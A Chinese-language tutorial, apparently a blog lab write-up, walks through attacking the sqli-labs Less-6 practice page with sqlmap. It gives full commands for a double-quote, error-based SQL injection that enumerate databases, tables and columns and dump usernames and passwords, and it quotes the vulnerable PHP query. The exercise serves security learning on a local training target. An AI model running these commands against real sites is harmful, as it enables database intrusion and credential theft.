网络安全-sqlmap实战之sqlilabs-Less6

目录

类型

-dbs枚举数据库

--tables枚举数据库表

--columns枚举列

--dump枚举数据

查看源代码


类型

双引号注入

网络安全-sqlmap实战之sqlilabs-Less6_第1张图片 双引号

猜测sql语句

select * from users where id = ("参数") LIMIT 0,1

-dbs枚举数据库

使用-o参数优化,--batch参数进行跳过,--technique参数指定注入技术

python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-6/?id=1" --technique E -o -dbs --batch
网络安全-sqlmap实战之sqlilabs-Less6_第2张图片 dbs

--tables枚举数据库表

添加--dbms参数

python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-6/?id=1" --dbms mysql --technique E -o -D security --tables --batch

 

网络安全-sqlmap实战之sqlilabs-Less6_第3张图片 tables

--columns枚举列

python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-6/?id=1" --dbms mysql --technique E -o -D security -T users --columns --batch

 

网络安全-sqlmap实战之sqlilabs-Less6_第4张图片 columns

--dump枚举数据

python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-6/?id=1" --dbms mysql --technique E -o -D security -T users -C username,password --dump --batch
网络安全-sqlmap实战之sqlilabs-Less6_第5张图片 data

查看源代码

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

更多内容查看:网络安全-自学笔记

有问题请下方评论,转载请注明出处,并附有原文链接,谢谢!如有侵权,请及时联系。

你可能感兴趣的:(网络安全)